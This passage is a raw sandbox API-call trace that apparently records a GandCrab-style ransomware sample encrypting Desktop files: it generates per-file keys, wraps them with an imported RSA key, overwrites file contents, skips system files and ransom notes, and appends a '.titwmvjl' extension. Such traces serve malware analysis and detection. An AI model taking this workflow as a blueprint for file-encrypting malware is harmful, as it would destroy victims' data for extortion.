(lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.142] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.142] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0089.144] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0089.144] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0089.144] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0089.144] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0089.144] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.144] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.144] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.144] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.145] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0089.146] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.146] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503478) returned 1 [0089.146] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.146] CryptGetKeyParam (in: hKey=0x503478, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0089.147] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.147] CryptEncrypt (in: hKey=0x503478, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0089.147] GetLastError () returned 0x0 [0089.147] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.147] CryptDestroyKey (hKey=0x503478) returned 1 [0089.147] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.148] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.148] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.148] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0089.149] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.150] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503938) returned 1 [0089.150] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.150] CryptGetKeyParam (in: hKey=0x503938, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0089.150] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.150] CryptEncrypt (in: hKey=0x503938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0089.151] GetLastError () returned 0x0 [0089.151] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.151] CryptDestroyKey (hKey=0x503938) returned 1 [0089.151] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.151] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.151] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0089.151] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0089.152] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0x6860, lpOverlapped=0x0) returned 1 [0089.159] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xffff97a0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.159] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x6860, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0x6860, lpOverlapped=0x0) returned 1 [0089.160] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.161] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0089.162] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.166] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.166] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.166] CloseHandle (hObject=0x2ac) returned 1 [0089.167] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\ONmHCIawZAQ6l.wav" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\onmhciawzaq6l.wav"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\ONmHCIawZAQ6l.wav.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\onmhciawzaq6l.wav.titwmvjl"), dwFlags=0x1) returned 1 [0089.168] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.168] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0089.168] lstrcmpW (lpString1="RXVJC.m4a", lpString2=".") returned 1 [0089.168] lstrcmpW (lpString1="RXVJC.m4a", lpString2="..") returned 1 [0089.168] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpString2="RXVJC.m4a" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\RXVJC.m4a") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\RXVJC.m4a" [0089.168] lstrlenW (lpString=".titwmvjl") returned 9 [0089.168] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\RXVJC.m4a") returned 39 [0089.168] VirtualAlloc (lpAddress=0x0, dwSize=0x8e, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0089.168] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\RXVJC.m4a.titwmvjl") returned 48 [0089.168] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\RXVJC.m4a") returned 39 [0089.168] lstrlenW (lpString=".m4a") returned 4 [0089.168] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.168] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".m4a ") returned 5 [0089.169] lstrcmpiW (lpString1=".m4a", lpString2=".titwmvjl") returned -1 [0089.169] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.169] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\RXVJC.m4a") returned 39 [0089.169] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\RXVJC.m4a") returned 39 [0089.169] lstrcmpiW (lpString1="RXVJC.m4a", lpString2="desktop.ini") returned 1 [0089.169] lstrcmpiW (lpString1="RXVJC.m4a", lpString2="autorun.inf") returned 1 [0089.169] lstrcmpiW (lpString1="RXVJC.m4a", lpString2="ntuser.dat") returned 1 [0089.169] lstrcmpiW (lpString1="RXVJC.m4a", lpString2="iconcache.db") returned 1 [0089.169] lstrcmpiW (lpString1="RXVJC.m4a", lpString2="bootsect.bak") returned 1 [0089.169] lstrcmpiW (lpString1="RXVJC.m4a", lpString2="boot.ini") returned 1 [0089.169] lstrcmpiW (lpString1="RXVJC.m4a", lpString2="ntuser.dat.log") returned 1 [0089.169] lstrcmpiW (lpString1="RXVJC.m4a", lpString2="thumbs.db") returned -1 [0089.169] lstrcmpiW (lpString1="RXVJC.m4a", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0089.169] lstrcmpiW (lpString1="RXVJC.m4a", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0089.169] lstrcmpiW (lpString1="RXVJC.m4a", lpString2="KRAB-DECRYPT.html") returned 1 [0089.169] lstrcmpiW (lpString1="RXVJC.m4a", lpString2="CRAB-DECRYPT.html") returned 1 [0089.169] lstrcmpiW (lpString1="RXVJC.m4a", lpString2="KRAB-DECRYPT.txt") returned 1 [0089.169] lstrcmpiW (lpString1="RXVJC.m4a", lpString2="CRAB-DECRYPT.txt") returned 1 [0089.169] lstrcmpiW (lpString1="RXVJC.m4a", lpString2="ntldr") returned 1 [0089.169] lstrcmpiW (lpString1="RXVJC.m4a", lpString2="NTDETECT.COM") returned 1 [0089.169] lstrcmpiW (lpString1="RXVJC.m4a", lpString2="Bootfont.bin") returned 1 [0089.169] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\RXVJC.m4a") returned 39 [0089.169] lstrlenW (lpString=".m4a") returned 4 [0089.169] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.169] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".m4a ") returned 5 [0089.170] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.170] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.170] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\RXVJC.m4a" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\rxvjc.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0089.170] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.170] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0089.171] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.171] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.171] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0089.173] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0089.173] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0089.173] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0089.173] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0089.173] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.174] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.174] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.174] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.174] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0089.175] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0089.176] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0089.176] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0089.176] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0089.176] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.176] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.176] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.176] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.177] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0089.178] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.178] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503938) returned 1 [0089.178] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.178] CryptGetKeyParam (in: hKey=0x503938, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0089.178] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.179] CryptEncrypt (in: hKey=0x503938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0089.179] GetLastError () returned 0x0 [0089.179] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.179] CryptDestroyKey (hKey=0x503938) returned 1 [0089.179] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.179] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.179] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.180] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0089.181] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.181] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503578) returned 1 [0089.181] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.181] CryptGetKeyParam (in: hKey=0x503578, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0089.182] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.182] CryptEncrypt (in: hKey=0x503578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0089.182] GetLastError () returned 0x0 [0089.182] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.182] CryptDestroyKey (hKey=0x503578) returned 1 [0089.182] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.182] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.182] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0089.183] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0089.183] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0xeb60, lpOverlapped=0x0) returned 1 [0089.192] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xffff14a0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.192] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xeb60, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0xeb60, lpOverlapped=0x0) returned 1 [0089.193] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.193] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0089.195] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.199] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.199] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.200] CloseHandle (hObject=0x2ac) returned 1 [0089.200] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\RXVJC.m4a" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\rxvjc.m4a"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\RXVJC.m4a.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\rxvjc.m4a.titwmvjl"), dwFlags=0x1) returned 1 [0089.201] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.201] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0089.201] lstrcmpW (lpString1="SJKpPG7Gi7Gg_.swf", lpString2=".") returned 1 [0089.201] lstrcmpW (lpString1="SJKpPG7Gi7Gg_.swf", lpString2="..") returned 1 [0089.201] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpString2="SJKpPG7Gi7Gg_.swf" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\SJKpPG7Gi7Gg_.swf") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\SJKpPG7Gi7Gg_.swf" [0089.201] lstrlenW (lpString=".titwmvjl") returned 9 [0089.201] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\SJKpPG7Gi7Gg_.swf") returned 47 [0089.201] VirtualAlloc (lpAddress=0x0, dwSize=0x9e, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0089.202] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\SJKpPG7Gi7Gg_.swf.titwmvjl") returned 56 [0089.202] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\SJKpPG7Gi7Gg_.swf") returned 47 [0089.202] lstrlenW (lpString=".swf") returned 4 [0089.202] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.202] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".swf ") returned 5 [0089.202] lstrcmpiW (lpString1=".swf", lpString2=".titwmvjl") returned -1 [0089.202] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.202] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\SJKpPG7Gi7Gg_.swf") returned 47 [0089.202] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\SJKpPG7Gi7Gg_.swf") returned 47 [0089.202] lstrcmpiW (lpString1="SJKpPG7Gi7Gg_.swf", lpString2="desktop.ini") returned 1 [0089.202] lstrcmpiW (lpString1="SJKpPG7Gi7Gg_.swf", lpString2="autorun.inf") returned 1 [0089.202] lstrcmpiW (lpString1="SJKpPG7Gi7Gg_.swf", lpString2="ntuser.dat") returned 1 [0089.202] lstrcmpiW (lpString1="SJKpPG7Gi7Gg_.swf", lpString2="iconcache.db") returned 1 [0089.202] lstrcmpiW (lpString1="SJKpPG7Gi7Gg_.swf", lpString2="bootsect.bak") returned 1 [0089.202] lstrcmpiW (lpString1="SJKpPG7Gi7Gg_.swf", lpString2="boot.ini") returned 1 [0089.202] lstrcmpiW (lpString1="SJKpPG7Gi7Gg_.swf", lpString2="ntuser.dat.log") returned 1 [0089.202] lstrcmpiW (lpString1="SJKpPG7Gi7Gg_.swf", lpString2="thumbs.db") returned -1 [0089.202] lstrcmpiW (lpString1="SJKpPG7Gi7Gg_.swf", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0089.202] lstrcmpiW (lpString1="SJKpPG7Gi7Gg_.swf", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0089.202] lstrcmpiW (lpString1="SJKpPG7Gi7Gg_.swf", lpString2="KRAB-DECRYPT.html") returned 1 [0089.202] lstrcmpiW (lpString1="SJKpPG7Gi7Gg_.swf", lpString2="CRAB-DECRYPT.html") returned 1 [0089.202] lstrcmpiW (lpString1="SJKpPG7Gi7Gg_.swf", lpString2="KRAB-DECRYPT.txt") returned 1 [0089.202] lstrcmpiW (lpString1="SJKpPG7Gi7Gg_.swf", lpString2="CRAB-DECRYPT.txt") returned 1 [0089.202] lstrcmpiW (lpString1="SJKpPG7Gi7Gg_.swf", lpString2="ntldr") returned 1 [0089.202] lstrcmpiW (lpString1="SJKpPG7Gi7Gg_.swf", lpString2="NTDETECT.COM") returned 1 [0089.203] lstrcmpiW (lpString1="SJKpPG7Gi7Gg_.swf", lpString2="Bootfont.bin") returned 1 [0089.203] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\SJKpPG7Gi7Gg_.swf") returned 47 [0089.203] lstrlenW (lpString=".swf") returned 4 [0089.203] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.203] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".swf ") returned 5 [0089.203] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.203] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.203] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\SJKpPG7Gi7Gg_.swf" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\sjkppg7gi7gg_.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0089.204] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.204] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0089.205] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.205] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.205] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0089.206] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0089.206] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0089.206] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0089.207] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0089.207] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.207] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.207] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.207] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.207] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0089.208] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0089.208] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0089.209] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0089.209] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0089.209] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.209] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.209] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.209] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.209] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0089.210] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.210] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503578) returned 1 [0089.211] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.211] CryptGetKeyParam (in: hKey=0x503578, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0089.211] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.211] CryptEncrypt (in: hKey=0x503578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0089.211] GetLastError () returned 0x0 [0089.211] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.211] CryptDestroyKey (hKey=0x503578) returned 1 [0089.211] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.211] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.212] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.212] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0089.213] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.213] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503638) returned 1 [0089.213] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.213] CryptGetKeyParam (in: hKey=0x503638, dwParam=0x8, pbData=0x259f38c, 